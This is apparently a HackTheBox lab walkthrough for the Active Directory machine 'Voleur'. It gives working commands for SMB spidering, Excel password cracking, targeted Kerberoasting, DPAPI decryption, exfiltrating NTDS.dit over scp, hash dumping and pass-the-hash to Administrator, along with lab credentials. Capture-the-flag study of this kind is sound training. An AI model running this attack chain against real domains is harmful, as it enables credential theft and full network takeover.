HackTheBox: Voleur

Introduction

Voleur is a Windows Active Directory machine built around an assumed breach scenario - you’re handed low-privileged credentials right from the start. NTLM is disabled, so everything goes through Kerberos. The path to root:

Kerberos setup → configure your attacker machine to talk to the domain
SMB enumeration → find a password-protected Excel file on the IT share
Crack the Excel password → open the spreadsheet, discover service account credentials
Targeted Kerberoasting → exploit WriteSPN rights to get a crackable hash for svc_winrm
Foothold → WinRM shell as svc_winrm (user flag here)
Lateral movement → restore a deleted AD user, decrypt a DPAPI credential blob, pivot to jeremy.combs
Privilege escalation → SSH into a WSL Linux subsystem as svc_backup, grab NTDS backups, dump all hashes
Root → Pass-the-Hash with the Administrator NT hash → full domain compromise

Key Concepts

What is an assumed breach? In real engagements, attackers sometimes already have a foothold (e.g. via phishing). This machine simulates that - you start with valid low-priv credentials instead of having to break in from scratch.

What is NTLM vs Kerberos? Windows networks support two authentication protocols. NTLM is the older, simpler one. Kerberos is the modern standard used in Active Directory. On this box NTLM is completely disabled, so every tool needs the -k flag to use Kerberos instead.

What is Kerberoasting? Service accounts in AD often have a ServicePrincipalName (SPN) attribute. Any authenticated user can request a Kerberos ticket for that service (a TGS), and that ticket is encrypted with the service account’s password hash. You can take that ticket offline and crack it with a wordlist - no interaction with the DC needed after the initial request.

What is WriteSPN? This is an AD permission that lets you add or modify the ServicePrincipalName attribute of another account. If an account doesn’t have an SPN, it can’t be Kerberoasted. But if you have WriteSPN over it, you can add one - turning a non-Kerberoastable account into one you can attack. This is called Targeted Kerberoasting.

What is DPAPI? The Data Protection API is a Windows feature that encrypts secrets (passwords, keys, etc.) using the current user’s login password. It stores two things: a master key (locked by the user’s password) and a credential blob (locked by the master key). If you have the user’s password and SID, you can decrypt both and recover whatever was stored inside.

What is NTDS.dit? This is the Active Directory database file - it stores every user account, group, and password hash in the domain. Getting your hands on it (and the SYSTEM hive to decrypt it) is effectively full domain compromise, since you can extract the Administrator hash and log in as them.

What is WSL? Windows Subsystem for Linux lets you run a real Linux environment inside Windows. On this box, the admins set up a Linux subsystem for backup purposes - and left an SSH key that lets us log into it. Once inside, we can access Windows files through /mnt/c/, including the AD backup files.

Enumeration

Nmap: fast two-pass scan

ports=$(nmap -p- --min-rate=1000 -T4 <TARGET> | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -sC -sV <TARGET>

Key open ports:

Port	Service	Notes
53	DNS	Confirms this is a Domain Controller
88	Kerberos	AD authentication
389 / 3268	LDAP	AD directory queries
445	SMB	File shares
2222	SSH (Ubuntu)	Linux subsystem - unusual!
5985	WinRM	Remote PowerShell

The domain name from the Nmap output is voleur.htb. Port 2222 running Ubuntu is a big clue - there’s a Linux subsystem hidden on this Windows box.

Configure Kerberos (required: NTLM is disabled)

First, add the domain to your hosts file:

echo "<TARGET> DC.voleur.htb voleur.htb DC" | sudo tee -a /etc/hosts

Generate a Kerberos config file using netexec, then write it to /etc/krb5.conf:

netexec smb DC.voleur.htb -u 'ryan.naylor' -p 'HollowOct31Nyt' -d voleur.htb -k --generate-krb5-file voleur.krb5

echo '[libdefaults]
    dns_lookup_kdc = false
    dns_lookup_realm = false
    default_realm = VOLEUR.HTB
[realms]
    VOLEUR.HTB = {
        kdc = dc.voleur.htb
        admin_server = dc.voleur.htb
        default_domain = voleur.htb
    }
[domain_realm]
    .voleur.htb = VOLEUR.HTB
    voleur.htb = VOLEUR.HTB' | sudo tee /etc/krb5.conf

Sync your clock to the DC - Kerberos breaks if your time is off by more than 5 minutes:

sudo ntpdate <TARGET>

Why sync the clock? Kerberos uses timestamps as part of its security model. If your clock drifts too far from the DC’s, authentication will fail with a “clock skew” error.

Foothold: Password-Protected Excel on SMB

List shares with Kerberos auth

nxc smb DC.voleur.htb -u ryan.naylor -p 'HollowOct31Nyt' -k --shares

ryan.naylor has READ access to the IT share. Spider it for files:

nxc smb DC.voleur.htb -u ryan.naylor -p 'HollowOct31Nyt' -d voleur.htb -k --shares --spider IT --regex .

Found: //DC.voleur.htb/IT/First-Line Support/Access_Review.xlsx

Download the file

nxc smb DC.voleur.htb -u ryan.naylor -p 'HollowOct31Nyt' -d voleur.htb -k --share IT \
  --get-file 'First-Line Support\\Access_Review.xlsx' Access_Review.xlsx

Opening it shows a password prompt. Time to crack it.

Crack the Excel password

office2john Access_Review.xlsx > hash
sudo john hash --wordlist=/usr/share/wordlists/rockyou.txt

Password: football1

What is office2john? Microsoft Office files can be password-protected with an encryption scheme that wraps the document. office2john pulls out the cryptographic portion and formats it as a hash that John the Ripper can attempt to crack offline.

Read the spreadsheet

Open Access_Review.xlsx with password football1. It contains users, job titles, permissions, and notes including plaintext passwords for several service accounts. Key findings:

svc_ldap : M1XyC9pW7qT5Vn
svc_iis : N5pXyW1VqM7CZ8
todd.wolfe : NightT1meP1dg3on14 (account deleted - interesting)
Note about svc_backup says to speak to Jeremy

Verify credentials:

nxc smb DC.voleur.htb -u user.txt -p pass.txt -k --continue-on-success

svc_ldap and svc_iis both authenticate successfully.

Targeted Kerberoasting → Shell as svc_winrm

Collect AD data with BloodHound

bloodhound-python -u 'ryan.naylor' -d 'voleur.htb' -p 'HollowOct31Nyt' -c all --zip -ns <TARGET> --dns-tcp

Upload the zip to BloodHound. The graph reveals:

SVC_LDAP has WriteSPN over SVC_WINRM

This means we can add an SPN to svc_winrm, making it Kerberoastable.

Get a TGT for svc_ldap

impacket-getTGT voleur.htb/svc_ldap -dc-ip <TARGET>
# enter password: M1XyC9pW7qT5Vn
export KRB5CCNAME=svc_ldap.ccache

What is a TGT? A Ticket Granting Ticket is your “login token” in Kerberos. Once you have one, you can request service tickets (TGS) for anything on the domain without re-entering your password. The KRB5CCNAME environment variable tells tools where to find your cached ticket.

Run the Targeted Kerberoast attack

python3 targetedKerberoast.py -d voleur.htb --dc-host DC -u svc_ldap@voleur.htb -k

This automatically adds an SPN to svc_winrm, requests a TGS, and prints the crackable hash.

Crack the hash

hashcat hash /usr/share/wordlists/rockyou.txt

svc_winrm password: AFireInsidedeOzarctica980219afi

Get a shell

impacket-getTGT voleur.htb/svc_winrm -dc-ip <TARGET>
# enter password: AFireInsidedeOzarctica980219afi
export KRB5CCNAME=svc_winrm.ccache

evil-winrm -i dc.voleur.htb -r VOLEUR.HTB

*Evil-WinRM* PS C:\Users\svc_winrm\Documents>

✅ User flag captured. C:\Users\svc_winrm\Desktop\user.txt

Lateral Movement: Restore Deleted User + DPAPI

Restore deleted AD user (todd.wolfe)

The svc_ldap account is in a group called Restore Users. Use RunasCs.exe (upload it first via Evil-WinRM) to run commands as svc_ldap:

# Upload RunasCs first
upload RunasCs.exe

# Find deleted objects
./RunasCs.exe svc_ldap M1XyC9pW7qT5Vn "powershell.exe -NoProfile -ExecutionPolicy Bypass -Command Get-ADObject -Filter 'isDeleted -eq `$true' -IncludeDeletedObjects -Properties distinguishedName,objectSid -SearchBase 'CN=Deleted Objects,DC=voleur,DC=htb'"

Output shows Todd Wolfe with GUID 1c6b1deb-c372-4cbb-87b1-15031de169db. Restore it:

./RunasCs.exe svc_ldap M1XyC9pW7qT5Vn "powershell.exe -NoProfile -ExecutionPolicy Bypass -Command Restore-ADObject 'CN=Todd Wolfe\0ADEL:1c6b1deb-c372-4cbb-87b1-15031de169db,CN=Deleted Objects,DC=voleur,DC=htb'"

What is the AD Recycle Bin? When a user is deleted in Active Directory, it’s not immediately wiped - it’s moved to a hidden “Deleted Objects” container and kept for a recovery period. The Restore-ADObject cmdlet brings it back with all its original attributes intact.

Access todd.wolfe’s archived profile on SMB

Get a TGT for Todd using the spreadsheet password:

impacket-getTGT voleur.htb/todd.wolfe -dc-ip <TARGET>
# password: NightT1meP1dg3on14
export KRB5CCNAME=todd.wolfe.ccache

Spider the IT share - there’s an archived profile at IT/Second-Line Support/Archived Users/todd.wolfe/. Connect and browse:

impacket-smbclient -k todd.wolfe@dc.voleur.htb

Navigate to AppData\Roaming\Microsoft and download two things:

# Credential blob:
Credentials/772275FAD58525253490A9B0039791D3

# Master key:
Protect/S-1-5-21-3927696377-1337352550-2781715495-1110/08949382-134f-4c63-b93c-ce52efc0aa88

get 08949382-134f-4c63-b93c-ce52efc0aa88
get 772275FAD58525253490A9B0039791D3

Decrypt the DPAPI credential

Step 1 - decrypt the master key using Todd’s SID and password:

impacket-dpapi masterkey \
  -file 08949382-134f-4c63-b93c-ce52efc0aa88 \
  -sid S-1-5-21-3927696377-1337352550-2781715495-1110 \
  -password NightT1meP1dg3on14

Copy the decrypted key from the output (the long 0x... hex string).

Step 2 - decrypt the credential blob:

impacket-dpapi credential \
  -file 772275FAD58525253490A9B0039791D3 \
  -key 0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83

Result:

Username : jeremy.combs
Password : qT3V9pLXyN7W4m

Get a shell as jeremy.combs

impacket-getTGT voleur.htb/jeremy.combs -dc-ip <TARGET>
# password: qT3V9pLXyN7W4m
export KRB5CCNAME=jeremy.combs.ccache

evil-winrm -i dc.voleur.htb -r VOLEUR.HTB

Privilege Escalation: WSL + NTDS Backup → Administrator

Find the SSH key

As jeremy.combs, navigate to C:\IT\Third-Line Support:

*Evil-WinRM* PS C:\IT\Third-Line Support> dir

id_rsa       ← SSH private key
Note.txt.txt ← a note from Admin

Read the note - it mentions WSL being set up for backup purposes and an SSH key for svc_backup. Our Nmap scan already showed SSH on port 2222. Let’s use it:

download id_rsa

SSH into the WSL Linux subsystem

chmod 600 id_rsa
ssh -i id_rsa svc_backup@<TARGET> -p 2222

Welcome to Ubuntu 20.04 LTS (GNU/Linux 4.4.0-20348-Microsoft x86_64)
svc_backup@DC:~$

Why does this work? WSL gives Linux a full view of the Windows filesystem under /mnt/c/. The svc_backup account was set up to run Linux backup tools - which means it has read access to backup files stored on the Windows side.

Grab the NTDS backup files

Browse to the backup folder:

cd "/mnt/c/IT/Third-Line Support/Backups"
ls
# Active Directory/   registry/

Download all three files using SCP (run these from your attack machine):

scp -i id_rsa -P 2222 "svc_backup@<TARGET>:/mnt/c/IT/Third-Line Support/Backups/Active Directory/ntds.dit" ./ntds.dit
scp -i id_rsa -P 2222 "svc_backup@<TARGET>:/mnt/c/IT/Third-Line Support/Backups/registry/SYSTEM" ./SYSTEM
scp -i id_rsa -P 2222 "svc_backup@<TARGET>:/mnt/c/IT/Third-Line Support/Backups/registry/SECURITY" ./SECURITY

What are SYSTEM and SECURITY? NTDS.dit is encrypted - the key lives in the Windows registry. The SYSTEM hive contains the boot key needed to decrypt it. The SECURITY hive holds cached domain credentials. Together, these three files let you extract every hash offline.

Dump all hashes

impacket-secretsdump -ntds ntds.dit -system SYSTEM -security SECURITY LOCAL

The Administrator hash:

Administrator:500:aad3b435b51404eeaad3b435b51404ee:e656e07c56d831611b577b160b259ad2:::

Root: Pass-the-Hash as Administrator

Even though NTLM is disabled for SMB, we can still use the NT hash to get a Kerberos TGT via Impacket:

impacket-getTGT voleur.htb/administrator -hashes :e656e07c56d831611b577b160b259ad2
export KRB5CCNAME=administrator.ccache

evil-winrm -i dc.voleur.htb -r VOLEUR.HTB

*Evil-WinRM* PS C:\Users\Administrator\Documents>

✅ Root flag captured. C:\Users\Administrator\Desktop\root.txt

Summary

nmap → voleur.htb, port 2222 (WSL SSH hint)
         ↓
Kerberos setup → /etc/hosts, /etc/krb5.conf, ntpdate
         ↓
nxc -k --shares → IT share (READ)
         ↓
Access_Review.xlsx → office2john + john → password: football1
         ↓
Spreadsheet contents → svc_ldap:M1XyC9pW7qT5Vn, svc_iis:N5pXyW1VqM7CZ8
         ↓
BloodHound → svc_ldap has WriteSPN over svc_winrm
         ↓
impacket-getTGT (svc_ldap) → targetedKerberoast → TGS hash
         ↓
hashcat → svc_winrm:AFireInsidedeOzarctica980219afi
         ↓
evil-winrm (Kerberos) → shell as svc_winrm → USER FLAG
         ↓
svc_ldap in "Restore Users" group → RunasCs → Restore-ADObject (todd.wolfe)
         ↓
impacket-smbclient (todd.wolfe) → Archived profile → DPAPI files
         ↓
impacket-dpapi masterkey + credential → jeremy.combs:qT3V9pLXyN7W4m
         ↓
evil-winrm (jeremy.combs) → C:\IT\Third-Line Support → id_rsa
         ↓
ssh -i id_rsa svc_backup@... -p 2222 → WSL Ubuntu shell
         ↓
/mnt/c/IT/.../Backups → ntds.dit + SYSTEM + SECURITY
         ↓
impacket-secretsdump LOCAL → Administrator NT hash
         ↓
impacket-getTGT -hashes → evil-winrm → ROOT FLAG

Tools Used

Tool	What it does	How to get it
netexec (nxc)	Swiss-army knife for SMB/WinRM enumeration with Kerberos support	`pip install netexec`
bloodhound-python	Collects AD data (users, groups, ACLs) for BloodHound analysis	`pip install bloodhound`
BloodHound	Visualises AD attack paths as a graph	github.com/BloodHoundAD/BloodHound
office2john	Extracts crackable hash from password-protected Office files	Built into Kali (`john` suite)
john	Password cracker	`sudo apt install john`
targetedKerberoast	Adds a temporary SPN, requests a TGS, then removes it	github.com/ShutdownRepo/targetedKerberoast
hashcat	GPU-accelerated password cracker (faster than john for hashes)	`sudo apt install hashcat`
impacket-getTGT	Requests a Kerberos TGT (supports hash-based auth)	`pip install impacket`
impacket-smbclient	Interactive SMB shell with Kerberos support	`pip install impacket`
impacket-dpapi	Decrypts DPAPI master keys and credential blobs	`pip install impacket`
impacket-secretsdump	Dumps hashes from NTDS.dit + registry hives offline	`pip install impacket`
evil-winrm	WinRM shell with Kerberos authentication	`gem install evil-winrm`
RunasCs.exe	Run commands as another user (like `runas` but with network logon)	github.com/antonioCoco/RunasCs